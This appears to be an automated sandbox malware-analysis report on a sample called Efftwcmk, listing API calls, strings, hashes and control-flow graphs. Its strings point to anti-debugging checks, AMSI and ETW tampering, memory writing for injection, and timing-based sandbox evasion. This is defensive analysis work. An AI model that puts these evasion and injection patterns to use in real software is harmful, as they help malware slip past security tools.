                                                      • String ID: Advapi$BCryptVerifySignature$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                      • API String ID: 2822495149-1690217862
                                                      • Opcode ID: 4c1311eb5434b8680748afc131119d4824039d95005a30db277687d5824be99f
                                                      • Instruction ID: cd506fde5834dc2053437469dcf33212b13bf06a5236f0249b3a1ca39d57a6bf
                                                      • Opcode Fuzzy Hash: 4c1311eb5434b8680748afc131119d4824039d95005a30db277687d5824be99f
                                                      • Instruction Fuzzy Hash: 9C43EF75B501598BDB28FB64CD80ADEB3BAFF85304F1045E6E008A7654DB70AE99EF10

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 5696 2c75a78-2c75ab9 GetModuleFileNameA RegOpenKeyExA 5697 2c75afb-2c75b3e call 2c758b4 RegQueryValueExA 5696->5697 5698 2c75abb-2c75ad7 RegOpenKeyExA 5696->5698 5703 2c75b62-2c75b7c RegCloseKey 5697->5703 5704 2c75b40-2c75b5c RegQueryValueExA 5697->5704 5698->5697 5699 2c75ad9-2c75af5 RegOpenKeyExA 5698->5699 5699->5697 5702 2c75b84-2c75bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 5699->5702 5705 2c75c9e-2c75ca5 5702->5705 5706 2c75bbb-2c75bbf 5702->5706 5704->5703 5707 2c75b5e 5704->5707 5709 2c75bc1-2c75bc5 5706->5709 5710 2c75bcb-2c75be1 lstrlenA 5706->5710 5707->5703 5709->5705 5709->5710 5711 2c75be4-2c75be7 5710->5711 5712 2c75bf3-2c75bfb 5711->5712 5713 2c75be9-2c75bf1 5711->5713 5712->5705 5715 2c75c01-2c75c06 5712->5715 5713->5712 5714 2c75be3 5713->5714 5714->5711 5716 2c75c30-2c75c32 5715->5716 5717 2c75c08-2c75c2e lstrcpynA LoadLibraryExA 5715->5717 5716->5705 5718 2c75c34-2c75c38 5716->5718 5717->5716 5718->5705 5719 2c75c3a-2c75c6a lstrcpynA LoadLibraryExA 5718->5719 5719->5705 5720 2c75c6c-2c75c9c lstrcpynA LoadLibraryExA 5719->5720 5720->5705
                                                      APIs
                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C70000,02C9A790), ref: 02C75A94
                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 02C75AB2
                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02C75AD0
                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C75AEE
                                                      • RegQueryValueExA.ADVAPI32 ref: 02C75B37
                                                      • RegQueryValueExA.ADVAPI32 ref: 02C75B55
                                                      • RegCloseKey.ADVAPI32(?), ref: 02C75B77
                                                      • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02C75B94
                                                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02C75BA1
                                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02C75BA7
                                                      • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02C75BD2
                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C75C19
                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C75C29
                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C75C51
                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C75C61
                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02C75C87
                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02C75C97
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                      • API String ID: 1759228003-2375825460
                                                      • Opcode ID: e1bdda62ac6f0270a1f4bdb2ce0b731660733788cb9851dca312ad586d8557f7
                                                      • Instruction ID: 7288f14fa6640d5259336a3f0f65ce3746f7c28728a4f1bfba5985f0f55c0b83
                                                      • Opcode Fuzzy Hash: e1bdda62ac6f0270a1f4bdb2ce0b731660733788cb9851dca312ad586d8557f7
                                                      • Instruction Fuzzy Hash: 56518571E4024C7EFB25D6A4CC46FEF7BAD9B48784F8401A5AA04E61C1DBB49B449FA0

                                                      Control-flow Graph

                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(ntdll,00000000,00000000,02C87AF8,?,?,00000000), ref: 02C87AB8
                                                      • GetProcAddress.KERNEL32(00000000,ntdll,00000000,00000000,02C87AF8,?,?,00000000), ref: 02C87ABE
                                                      • NtWriteVirtualMemory.NTDLL(?,?,?,?,?,00000000,ntdll,00000000,00000000,02C87AF8,?,?,00000000), ref: 02C87ADC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleMemoryModuleProcVirtualWrite
                                                      • String ID: NtWriteV$irtualMemory$ntdll
                                                      • API String ID: 4260932595-852282483
                                                      • Opcode ID: da7f9603664c934a8a725272b1d9c85410aabc1c5f2d2d1698517c45547aa022
                                                      • Instruction ID: 11bbcf56a5f7f31fd701fbdaefb757180d71b628688fda87d0bcafc06ba912e5
                                                      • Opcode Fuzzy Hash: da7f9603664c934a8a725272b1d9c85410aabc1c5f2d2d1698517c45547aa022
                                                      • Instruction Fuzzy Hash: C4014FB5640204BFD710EFA8DC51EAB77EDEB48714B614864F805D3A00E635ED149B60

                                                      Control-flow Graph

                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(ntdll,00000000,00000000,02C87AF8,?,?,00000000), ref: 02C87AB8
                                                      • GetProcAddress.KERNEL32(00000000,ntdll,00000000,00000000,02C87AF8,?,?,00000000), ref: 02C87ABE
                                                      • NtWriteVirtualMemory.NTDLL(?,?,?,?,?,00000000,ntdll,00000000,00000000,02C87AF8,?,?,00000000), ref: 02C87ADC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleMemoryModuleProcVirtualWrite
                                                      • String ID: NtWriteV$irtualMemory$ntdll
                                                      • API String ID: 4260932595-852282483
                                                      • Opcode ID: 76add324497cea4de737b14661049dc42315bd06f38ff56f07bb4f4edcb47c02
                                                      • Instruction ID: 6cb41c540d328190442c8660e3649d1a747a91fd1f4f6ca4581b4784aa447549
                                                      • Opcode Fuzzy Hash: 76add324497cea4de737b14661049dc42315bd06f38ff56f07bb4f4edcb47c02
                                                      • Instruction Fuzzy Hash: 35014FB5640204AFD710EFA8DC51EAB77EDEB48714B614864F805D3A00E635ED149B60

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 7668 2c8d6d4-2c8d6ee GetModuleHandleW 7669 2c8d6f0-2c8d702 GetProcAddress 7668->7669 7670 2c8d723-2c8d72b 7668->7670 7669->7670 7671 2c8d704-2c8d71d NtQueryInformationProcess 7669->7671 7671->7670 7672 2c8d71f 7671->7672 7672->7670
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(ntdll), ref: 02C8D6E4
                                                      • GetProcAddress.KERNEL32(00000000,ZwQueryInformationProcess,ntdll), ref: 02C8D6F6
                                                      • NtQueryInformationProcess.NTDLL(FFFFFFFF,0000001F,?,00000004,?,00000000,ZwQueryInformationProcess,ntdll), ref: 02C8D715
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleInformationModuleProcProcessQuery
                                                      • String ID: ZwQueryInformationProcess$ntdll
                                                      • API String ID: 3384173408-191046249
                                                      • Opcode ID: 726d82e8431fa40872568732d8a37e668c01dea3ad91157ea0d4120ada539235
                                                      • Instruction ID: 4b34a657af9cd380aaa687ed400f8a30d1b9273e06a4f118308b3412db2007be
                                                      • Opcode Fuzzy Hash: 726d82e8431fa40872568732d8a37e668c01dea3ad91157ea0d4120ada539235
                                                      • Instruction Fuzzy Hash: 2BF0E930D0425C7AEB10BAF98C84BEDB7BC9B05368F5483D8A537A21C1D7705340CB51

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 7673 2c8d654-2c8d66e GetModuleHandleW 7674 2c8d670-2c8d682 GetProcAddress 7673->7674 7675 2c8d6a2-2c8d6aa 7673->7675 7674->7675 7676 2c8d684-2c8d69c NtQueryInformationProcess 7674->7676 7676->7675 7677 2c8d69e 7676->7677 7677->7675
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(ntdll), ref: 02C8D664
                                                      • GetProcAddress.KERNEL32(00000000,ZwQueryInformationProcess,ntdll), ref: 02C8D676
                                                      • NtQueryInformationProcess.NTDLL(FFFFFFFF,00000007,?,00000004,?,00000000,ZwQueryInformationProcess,ntdll), ref: 02C8D695
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleInformationModuleProcProcessQuery
                                                      • String ID: ZwQueryInformationProcess$ntdll
                                                      • API String ID: 3384173408-191046249
                                                      • Opcode ID: 32d93a8625a794e606a601fbeed052e3938b609c5eca86a0a048af6315ba2d6f
                                                      • Instruction ID: 5f49e1346918720bf83afa4f14805fd4e90f14b7bf980a0df9da83908b30c3b1
                                                      • Opcode Fuzzy Hash: 32d93a8625a794e606a601fbeed052e3938b609c5eca86a0a048af6315ba2d6f
                                                      • Instruction Fuzzy Hash: 0FF0B470CC421CB9E710B6B98C48BECBBAC5B05328F6487E0A57AA21C0D77417448B11

                                                      Control-flow Graph

                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02C87931
                                                      • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02C87937
                                                      • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02C87957
                                                      Strings
                                                      • C:\Windows\System32\ntdll.dll, xrefs: 02C8792C
                                                      • NtAllocateVirtualMemory, xrefs: 02C87927
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                      • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                      • API String ID: 421316089-2206134580
                                                      • Opcode ID: 3bf0975f38b41d949bf39253536b156c8af1774ba39b9e0014caa7f67cdbd310
                                                      • Instruction ID: cd2502888ff3ccd2d1e7f1c7a909a23806114e8219f220cd59063c14e9e5095c
                                                      • Opcode Fuzzy Hash: 3bf0975f38b41d949bf39253536b156c8af1774ba39b9e0014caa7f67cdbd310
                                                      • Instruction Fuzzy Hash: 2DE0E5B6680208BBDB00EE98E841EDA77ACAB08714F108415BA09C7200D674EA108BA4

                                                      Control-flow Graph

                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02C87931
                                                      • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02C87937
                                                      • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02C87957
                                                      Strings
                                                      • C:\Windows\System32\ntdll.dll, xrefs: 02C8792C
                                                      • NtAllocateVirtualMemory, xrefs: 02C87927
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                      • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                      • API String ID: 421316089-2206134580
                                                      • Opcode ID: e503cff665c082d7a07791c6b04839605eb5d555d63f110fd09972d8a06d34e8
                                                      • Instruction ID: 0c576de514b0bc924f344697ce5d59d7189a9f362ef76abe2677a37a8cbb9e9d
                                                      • Opcode Fuzzy Hash: e503cff665c082d7a07791c6b04839605eb5d555d63f110fd09972d8a06d34e8
                                                      • Instruction Fuzzy Hash: FEE01AB6580308BBDB00EF98E841EDB77ACAB0C714F108415BA09C7200D774EA10CBB4

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 02C74ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02C74EDA
                                                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02C8C888), ref: 02C8C7F3
                                                      • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02C8C888), ref: 02C8C823
                                                      • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02C8C838
                                                      • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02C8C864
                                                      • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02C8C86D
                                                        • Part of subcall function 02C74C0C: SysFreeString.OLEAUT32(02C8D3D4), ref: 02C74C1A
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                      • String ID:
                                                      • API String ID: 1897104825-0
                                                      • Opcode ID: 7d60823d912b667c01d6634be0bf35508398803d4407be93a46f8ef548376d22
                                                      • Instruction ID: 42e761c6c512dda73da1eaeae490faf54e0120517acb688af03fdcc3267bed50
                                                      • Opcode Fuzzy Hash: 7d60823d912b667c01d6634be0bf35508398803d4407be93a46f8ef548376d22
                                                      • Instruction Fuzzy Hash: B621C175B503087AEB15EAE4CC42FDEB7BDEB08704F504462B604F71C0E774AA459B65
                                                      APIs
                                                      • GetTickCount.KERNEL32(?,02C8D7AC,00000000,02C97487,?,?,00000269,00000000,00000000), ref: 02C8CCA2
                                                      • Sleep.KERNEL32(00000000,?,02C8D7AC,00000000,02C97487,?,?,00000269,00000000,00000000), ref: 02C8CCB4
                                                      • GetTickCount.KERNEL32(00000000,?,02C8D7AC,00000000,02C97487,?,?,00000269,00000000,00000000), ref: 02C8CCB9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CountTick$Sleep
                                                      • String ID: 500
                                                      • API String ID: 4250438611-612300854
                                                      • Opcode ID: 6ff66197e3fc1b560301f9cc9eeb25704e7587a30391feff6b9a937f77822739
                                                      • Instruction ID: 14f9bbcc17b0e8c2ccab09aeee22d2f1811fc22f84402a1ebe1dd393248b80fc
                                                      • Opcode Fuzzy Hash: 6ff66197e3fc1b560301f9cc9eeb25704e7587a30391feff6b9a937f77822739
                                                      • Instruction Fuzzy Hash: 59C08CEA291C0646DA007EF82AD49AB024E8B5032A7213D72E20AC6200C92AC7413A75
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000003,Pk)-N)-,2D26328B,00000003,2D28E948,0000000C,2D2633E2,00000003,00000002,00000000,Pk)-N)-,2D266136,00000003), ref: 2D2632D6
                                                      • TerminateProcess.KERNEL32(00000000), ref: 2D2632DD
                                                      • ExitProcess.KERNEL32 ref: 2D2632EF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID: Pk)-N)-
                                                      • API String ID: 1703294689-771429351
                                                      • Opcode ID: 889adc73c199acae6338fd82df4f1de88b6578f2d492c4ebd2d30972729f9bb7
                                                      • Instruction ID: 6529d7d81ea6bf80b0f65bcdac7db19ad93bcca1ef03c681504a508acebe32ef
                                                      • Opcode Fuzzy Hash: 889adc73c199acae6338fd82df4f1de88b6578f2d492c4ebd2d30972729f9bb7
                                                      • Instruction Fuzzy Hash: 37E04F31440344ABDF116F64CD0CA993BB9FB45645F044014FA4566231DB3AED81CAE4

                                                      Control-flow Graph

                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,2D294EF8,Pk)-N)-,00000000,2D294EF8,2D224CA8,00000000,00000000,00000000,?,2D294EF8,?), ref: 2D224E38
                                                      • SetEvent.KERNEL32(00000000), ref: 2D224E43
                                                      • CloseHandle.KERNELBASE(00000000), ref: 2D224E4C
                                                      • closesocket.WS2_32(FFFFFFFF), ref: 2D224E5A
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 2D224E91
                                                      • SetEvent.KERNEL32(00000000), ref: 2D224EA2
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 2D224EA9
                                                      • SetEvent.KERNEL32(00000000), ref: 2D224EBA
                                                      • CloseHandle.KERNEL32(00000000), ref: 2D224EBF
                                                      • CloseHandle.KERNEL32(00000000), ref: 2D224EC4
                                                      • SetEvent.KERNEL32(00000000), ref: 2D224ED1
                                                      • CloseHandle.KERNEL32(00000000), ref: 2D224ED6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                      • String ID: Pk)-N)-
                                                      • API String ID: 3658366068-771429351
                                                      • Opcode ID: 2783b4fc5d02adb0cd23ea08208704a19dd05f845d0efe9b3399ec3427e3e55f
                                                      • Instruction ID: 87fc8fb42493001f38afc3d6003fe616294b44450010188c6be2d6abd4aeab41
                                                      • Opcode Fuzzy Hash: 2783b4fc5d02adb0cd23ea08208704a19dd05f845d0efe9b3399ec3427e3e55f
                                                      • Instruction Fuzzy Hash: 48213931044B009FEB316B26CC48B17BBB6FF51736F104A18E2E221AF0CB65B851DB58

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 5738 2c9342a-2c93918 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c8cb40 call 2c7494c call 2c746a4 call 2c8d310 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 5877 2c9391e-2c93b99 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c74898 5738->5877 5878 2c93919 call 2c87df4 5738->5878 5951 2c93b9f-2c941f1 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c74798 call 2c7494c WinExec call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7494c call 2c746a4 call 2c8a18c call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c736a0 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 5877->5951 5952 2c946ce-2c948cd call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c74898 5877->5952 5878->5877 6514 2c941f8-2c944d6 call 2c85a64 call 2c74b78 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c749a4 RtlMoveMemory call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c8a4dc call 2c736d0 5951->6514 6515 2c941f3-2c941f6 5951->6515 6069 2c9510a-2c9528d call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c74898 5952->6069 6070 2c948d3-2c94ef2 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c72ee0 call 2c72f08 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 GetCurrentProcess call 2c87924 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 5952->6070 6204 2c95a5e-2c9714c call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 